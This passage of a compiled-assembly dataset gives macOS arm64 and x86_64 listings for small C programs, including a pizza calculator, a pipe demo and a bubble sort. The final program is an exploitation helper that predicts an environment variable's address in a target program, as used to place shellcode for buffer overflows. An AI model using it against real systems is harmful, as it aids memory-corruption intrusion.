%rcx callq _qsort movq $0, -8400(%rbp) movl $30, -8404(%rbp) LBB1_11: ## Parent Loop BB1_3 Depth=1 ## Parent Loop BB1_5 Depth=2 ## => This Inner Loop Header: Depth=3 cmpl $980, -8404(%rbp) ## imm = 0x3D4 jge LBB1_14 ## %bb.12: ## in Loop: Header=BB1_11 Depth=3 movslq -8404(%rbp), %rax movq -8320(%rbp,%rax,8), %rax addq -8400(%rbp), %rax movq %rax, -8400(%rbp) ## %bb.13: ## in Loop: Header=BB1_11 Depth=3 movl -8404(%rbp), %eax addl $1, %eax movl %eax, -8404(%rbp) jmp LBB1_11 LBB1_14: ## in Loop: Header=BB1_5 Depth=2 movq -8400(%rbp), %rax movl $950, %ecx ## imm = 0x3B6 cqto idivq %rcx movq %rax, -8400(%rbp) movq -8400(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.15: ## in Loop: Header=BB1_5 Depth=2 movl -8388(%rbp), %eax addl $1, %eax movl %eax, -8388(%rbp) jmp LBB1_5 LBB1_16: ## in Loop: Header=BB1_3 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.17: ## in Loop: Header=BB1_3 Depth=1 movl -8384(%rbp), %eax addl $1, %eax movl %eax, -8384(%rbp) jmp LBB1_3 LBB1_18: movl -8380(%rbp), %edi callq _close movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_20 ## %bb.19: xorl %eax, %eax addq $8416, %rsp ## imm = 0x20E0 popq %rbp retq LBB1_20: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "/dev/fibonacci" L_.str.1: ## @.str.1 .asciz "Failed to open character device" L_.str.2: ## @.str.2 .asciz "%lld " L_.str.3: ## @.str.3 .asciz "\n" .subsections_via_symbols
the_stack_data/62637296.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI0_0: .quad 0x401921f9f01b866e ; double 6.2831799999999998 lCPI0_1: .quad 0x400921f9f01b866e ; double 3.1415899999999999 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-20] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #16 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur s0, [x29, #-16] fcvt d1, s0 adrp x8, lCPI0_1@PAGE ldr d0, [x8, lCPI0_1@PAGEOFF] fmul d0, d0, d1 ldur s1, [x29, #-16] fcvt d1, s1 fmul d0, d0, d1 fcvt s0, d0 stur s0, [x29, #-8] ldur s0, [x29, #-16] fcvt d1, s0 adrp x8, lCPI0_0@PAGE ldr d0, [x8, lCPI0_0@PAGEOFF] fmul d0, d0, d1 fcvt s0, d0 stur s0, [x29, #-12] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur s0, [x29, #-12] fcvt d1, s0 ldur s0, [x29, #-8] fcvt d0, s0 mov x8, sp str d1, [x8] str d0, [x8, #8] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldur w0, [x29, #-20] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "What is the radius of your pizza?\n" l_.str.1: ; @.str.1 .asciz "%f" l_.str.2: ; @.str.2 .asciz "Your basic pizza parameters are as follows:\n" l_.str.3: ; @.str.3 .asciz "circumference = %1.2f, area = %1.2f\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function main LCPI0_0: .quad 0x401921f9f01b866e ## double 6.2831799999999998 LCPI0_1: .quad 0x400921f9f01b866e ## double 3.1415899999999999 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -16(%rbp), %rsi movb $0, %al callq _scanf movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_1(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 movss -16(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 mulsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -8(%rbp) movss -16(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm1 movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero mulsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -12(%rbp) leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movss -12(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 movss -8(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero cvtss2sd %xmm1, %xmm1 leaq L_.str.3(%rip), %rdi movb $2, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "What is the radius of your pizza?\n" L_.str.1: ## @.str.1 .asciz "%f" L_.str.2: ## @.str.2 .asciz "Your basic pizza parameters are as follows:\n" L_.str.3: ## @.str.3 .asciz "circumference = %1.2f, area = %1.2f\n" .subsections_via_symbols
the_stack_data/176706073.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/129895.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] stur wzr, [x29, #-20] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w8, #49 sturb w8, [x29, #-21] sub x0, x29, #16 bl _pipe bl _fork stur w0, [x29, #-28] ldur w8, [x29, #-28] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_1 LBB0_1: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur w0, [x29, #-12] bl _close mov w0, #10 bl _sleep str wzr, [sp, #32] str wzr, [sp, #28] b LBB0_2 LBB0_2: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #28] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB0_5 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_2 Depth=1 ldur w0, [x29, #-16] sub x1, x29, #21 mov x2, #1 bl _read mov x8, x0 str w8, [sp, #24] ldr w8, [sp, #24] ldr w9, [sp, #32] add w8, w8, w9 str w8, [sp, #32] ldr w9, [sp, #32] ; implicit-def: $x8 mov x8, x9 ldursb w10, [x29, #-21] mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_4 LBB0_4: ; in Loop: Header=BB0_2 Depth=1 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB0_2 LBB0_5: b LBB0_11 LBB0_6: ldur w0, [x29, #-16] bl _close str wzr, [sp, #20] b LBB0_7 LBB0_7: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #10 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=1 ldur w0, [x29, #-12] sub x1, x29, #21 mov x2, #1 bl _write mov x8, x0 str w8, [sp, #16] ldursb w8, [x29, #-21] add w8, w8, #97 sturb w8, [x29, #-21] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_7 LBB0_10: b LBB0_11 LBB0_11: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: bl ___stack_chk_fail LBB0_13: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "THis is gonna be example of system call pipe for interprocess communication\n" l_.str.1: ; @.str.1 .asciz "I am child and I am gonna accept everything that my dad passes to me\n" l_.str.2: ; @.str.2 .asciz "%d:\t %c\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -20(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf movb $49, -21(%rbp) leaq -16(%rbp), %rdi callq _pipe callq _fork movl %eax, -28(%rbp) cmpl $0, -28(%rbp) jne LBB0_6 ## %bb.1: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl -12(%rbp), %edi callq _close movl $10, %edi callq _sleep movl $0, -32(%rbp) movl $0, -36(%rbp) LBB0_2: ## =>This Inner Loop Header: Depth=1 cmpl $10, -36(%rbp) jge LBB0_5 ## %bb.3: ## in Loop: Header=BB0_2 Depth=1 movl -16(%rbp), %edi leaq -21(%rbp), %rsi movl $1, %edx callq _read ## kill: def $eax killed $eax killed $rax movl %eax, -40(%rbp) movl -40(%rbp), %eax addl -32(%rbp), %eax movl %eax, -32(%rbp) movl -32(%rbp), %esi movsbl -21(%rbp), %edx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.4: ## in Loop: Header=BB0_2 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_2 LBB0_5: jmp LBB0_11 LBB0_6: movl -16(%rbp), %edi callq _close movl $0, -44(%rbp) LBB0_7: ## =>This Inner Loop Header: Depth=1 cmpl $10, -44(%rbp) jge LBB0_10 ## %bb.8: ## in Loop: Header=BB0_7 Depth=1 movl -12(%rbp), %edi leaq -21(%rbp), %rsi movl $1, %edx callq _write ## kill: def $eax killed $eax killed $rax movl %eax, -48(%rbp) movsbl -21(%rbp), %eax addl $97, %eax ## kill: def $al killed $al killed $eax movb %al, -21(%rbp) ## %bb.9: ## in Loop: Header=BB0_7 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB0_7 LBB0_10: jmp LBB0_11 LBB0_11: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_13 ## %bb.12: xorl %eax, %eax addq $48, %rsp popq %rbp retq LBB0_13: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "THis is gonna be example of system call pipe for interprocess communication\n" L_.str.1: ## @.str.1 .asciz "I am child and I am gonna accept everything that my dad passes to me\n" L_.str.2: ## @.str.2 .asciz "%d:\t %c\n" .subsections_via_symbols
the_stack_data/828280.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #32] add x0, sp, #36 adrp x1, l___const.main.a@PAGE add x1, x1, l___const.main.a@PAGEOFF mov x2, #36 bl _memcpy mov w8, #9 str w8, [sp, #28] str wzr, [sp, #24] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #24] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldrsw x9, [sp, #24] add x8, sp, #36 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB0_1 LBB0_4: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf str wzr, [sp, #20] b LBB0_5 LBB0_5: ; =>This Loop Header: Depth=1 ; Child Loop BB0_7 Depth 2 ldr w8, [sp, #20] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_14 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 str wzr, [sp, #16] b LBB0_7 LBB0_7: ; Parent Loop BB0_5 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldr w9, [sp, #28] ldr w10, [sp, #20] subs w9, w9, w10 subs w9, w9, #1 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_12 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=2 ldrsw x8, [sp, #16] add x9, sp, #36 ldr w8, [x9, x8, lsl #2] ldr w10, [sp, #16] add w10, w10, #1 ldr w9, [x9, w10, sxtw #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=2 ldrsw x8, [sp, #16] add x9, sp, #36 ldr w8, [x9, x8, lsl #2] str w8, [sp, #12] ldr w8, [sp, #16] add w8, w8, #1 ldr w8, [x9, w8, sxtw #2] ldrsw x10, [sp, #16] str w8, [x9, x10, lsl #2] ldr w8, [sp, #12] ldr w10, [sp, #16] add w10, w10, #1 str w8, [x9, w10, sxtw #2] b LBB0_10 LBB0_10: ; in Loop: Header=BB0_7 Depth=2 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_7 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_7 LBB0_12: ; in Loop: Header=BB0_5 Depth=1 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_5 Depth=1 ldr w8, [sp, #20] add w8, w8, #1 str w8, [sp, #20] b LBB0_5 LBB0_14: str wzr, [sp, #8] b LBB0_15 LBB0_15: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #8] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_18 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_15 Depth=1 ldrsw x9, [sp, #8] add x8, sp, #36 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_17 LBB0_17: ; in Loop: Header=BB0_15 Depth=1 ldr w8, [sp, #8] add w8, w8, #1 str w8, [sp, #8] b LBB0_15 LBB0_18: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_20 b LBB0_19 LBB0_19: bl ___stack_chk_fail LBB0_20: mov w0, #0 ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .section __TEXT,__const .p2align 2 ; @__const.main.a l___const.main.a: .long 1 ; 0x1 .long 2 ; 0x2 .long 3 ; 0x3 .long 4 ; 0x4 .long 5 ; 0x5 .long 6 ; 0x6 .long 7 ; 0x7 .long 8 ; 0x8 .long 9 ; 0x9 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d " l_.str.1: ; @.str.1 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $80, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -52(%rbp) leaq -48(%rbp), %rdi leaq l___const.main.a(%rip), %rsi movl $36, %edx callq _memcpy movl $9, -56(%rbp) movl $0, -60(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -60(%rbp), %eax cmpl -56(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -60(%rbp), %rax movl -48(%rbp,%rax,4), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -60(%rbp), %eax addl $1, %eax movl %eax, -60(%rbp) jmp LBB0_1 LBB0_4: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -64(%rbp) LBB0_5: ## =>This Loop Header: Depth=1 ## Child Loop BB0_7 Depth 2 movl -64(%rbp), %eax cmpl -56(%rbp), %eax jge LBB0_14 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movl $0, -68(%rbp) LBB0_7: ## Parent Loop BB0_5 Depth=1 ## => This Inner Loop Header: Depth=2 movl -68(%rbp), %eax movl -56(%rbp), %ecx subl -64(%rbp), %ecx subl $1, %ecx cmpl %ecx, %eax jge LBB0_12 ## %bb.8: ## in Loop: Header=BB0_7 Depth=2 movslq -68(%rbp), %rax movl -48(%rbp,%rax,4), %eax movl -68(%rbp), %ecx addl $1, %ecx movslq %ecx, %rcx cmpl -48(%rbp,%rcx,4), %eax jge LBB0_10 ## %bb.9: ## in Loop: Header=BB0_7 Depth=2 movslq -68(%rbp), %rax movl -48(%rbp,%rax,4), %eax movl %eax, -72(%rbp) movl -68(%rbp), %eax addl $1, %eax cltq movl -48(%rbp,%rax,4), %ecx movslq -68(%rbp), %rax movl %ecx, -48(%rbp,%rax,4) movl -72(%rbp), %ecx movl -68(%rbp), %eax addl $1, %eax cltq movl %ecx, -48(%rbp,%rax,4) LBB0_10: ## in Loop: Header=BB0_7 Depth=2 jmp LBB0_11 LBB0_11: ## in Loop: Header=BB0_7 Depth=2 movl -68(%rbp), %eax addl $1, %eax movl %eax, -68(%rbp) jmp LBB0_7 LBB0_12: ## in Loop: Header=BB0_5 Depth=1 jmp LBB0_13 LBB0_13: ## in Loop: Header=BB0_5 Depth=1 movl -64(%rbp), %eax addl $1, %eax movl %eax, -64(%rbp) jmp LBB0_5 LBB0_14: movl $0, -76(%rbp) LBB0_15: ## =>This Inner Loop Header: Depth=1 movl -76(%rbp), %eax cmpl -56(%rbp), %eax jge LBB0_18 ## %bb.16: ## in Loop: Header=BB0_15 Depth=1 movslq -76(%rbp), %rax movl -48(%rbp,%rax,4), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.17: ## in Loop: Header=BB0_15 Depth=1 movl -76(%rbp), %eax addl $1, %eax movl %eax, -76(%rbp) jmp LBB0_15 LBB0_18: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_20 ## %bb.19: xorl %eax, %eax addq $80, %rsp popq %rbp retq LBB0_20: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__const .p2align 4 ## @__const.main.a l___const.main.a: .long 1 ## 0x1 .long 2 ## 0x2 .long 3 ## 0x3 .long 4 ## 0x4 .long 5 ## 0x5 .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 9 ## 0x9 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d " L_.str.1: ## @.str.1 .asciz "\n" .subsections_via_symbols
the_stack_data/87639118.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _testc_faux_ini_good ; -- Begin function testc_faux_ini_good .p2align 2 _testc_faux_ini_good: ; @testc_faux_ini_good .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 ; kill: def $x8 killed $xzr str xzr, [sp, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _getenv str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr x8, [sp, #8] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_2 LBB0_2: mov w0, #0 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _testc_faux_ini_bad ; -- Begin function testc_faux_ini_bad .p2align 2 _testc_faux_ini_bad: ; @testc_faux_ini_bad .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf mov w0, #-1 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _testc_faux_ini_signal ; -- Begin function testc_faux_ini_signal .p2align 2 _testc_faux_ini_signal: ; @testc_faux_ini_signal .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 ; kill: def $x8 killed $xzr str xzr, [sp, #8] ldr x8, [sp, #8] mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf mov w0, #-1 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "TESTC_TMPDIR" l_.str.1: ; @.str.1 .asciz "Env var is [%s]\n" l_.str.2: ; @.str.2 .asciz "Some debug information here\n" l_.str.3: ; @.str.3 .asciz "%s\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _testc_faux_ini_good ## -- Begin function testc_faux_ini_good .p2align 4, 0x90 _testc_faux_ini_good: ## @testc_faux_ini_good .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq $0, -8(%rbp) leaq L_.str(%rip), %rdi callq _getenv movq %rax, -8(%rbp) cmpq $0, -8(%rbp) je LBB0_2 ## %bb.1: movq -8(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf LBB0_2: xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _testc_faux_ini_bad ## -- Begin function testc_faux_ini_bad .p2align 4, 0x90 _testc_faux_ini_bad: ## @testc_faux_ini_bad .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl $4294967295, %eax ## imm = 0xFFFFFFFF popq %rbp retq .cfi_endproc ## -- End function .globl _testc_faux_ini_signal ## -- Begin function testc_faux_ini_signal .p2align 4, 0x90 _testc_faux_ini_signal: ## @testc_faux_ini_signal .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq $0, -8(%rbp) movq -8(%rbp), %rsi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $4294967295, %eax ## imm = 0xFFFFFFFF addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "TESTC_TMPDIR" L_.str.1: ## @.str.1 .asciz "Env var is [%s]\n" L_.str.2: ## @.str.2 .asciz "Some debug information here\n" L_.str.3: ## @.str.3 .asciz "%s\n" .subsections_via_symbols
the_stack_data/270205.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur x1, [x29, #-16] ldur w8, [x29, #-4] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x8, [x29, #-16] ldr x8, [x8] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov w0, #0 bl _exit LBB0_2: ldur x8, [x29, #-16] ldr x0, [x8, #8] bl _getenv str x0, [sp, #24] ldur x8, [x29, #-16] ldr x0, [x8] bl _strlen str x0, [sp, #16] ; 8-byte Folded Spill ldur x8, [x29, #-16] ldr x0, [x8, #16] bl _strlen mov x8, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload subs x9, x0, x8 ldr x8, [sp, #24] add x8, x8, x9, lsl #1 str x8, [sp, #24] ldur x8, [x29, #-16] ldr x10, [x8, #8] ldr x8, [sp, #24] mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Usage: %s <environment var> <target program name>\n" l_.str.1: ; @.str.1 .asciz "%s will be at %p\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) cmpl $3, -4(%rbp) jge LBB0_2 ## %bb.1: movq -16(%rbp), %rax movq (%rax), %rsi leaq L_.str(%rip), %rdi xorl %eax, %eax movl %eax, -28(%rbp) ## 4-byte Spill callq _printf movl -28(%rbp), %edi ## 4-byte Reload callq _exit LBB0_2: movq -16(%rbp), %rax movq 8(%rax), %rdi callq _getenv movq %rax, -24(%rbp) movq -16(%rbp), %rax movq (%rax), %rdi callq _strlen movq %rax, -40(%rbp) ## 8-byte Spill movq -16(%rbp), %rax movq 16(%rax), %rdi callq _strlen movq %rax, %rcx movq -40(%rbp), %rax ## 8-byte Reload subq %rcx, %rax shlq $1, %rax addq -24(%rbp), %rax movq %rax, -24(%rbp) movq -16(%rbp), %rax movq 8(%rax), %rsi movq -24(%rbp), %rdx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Usage: %s <environment var> <target program name>\n" L_.str.1: ## @.str.1 .asciz "%s will be at %p\n" .subsections_via_symbols
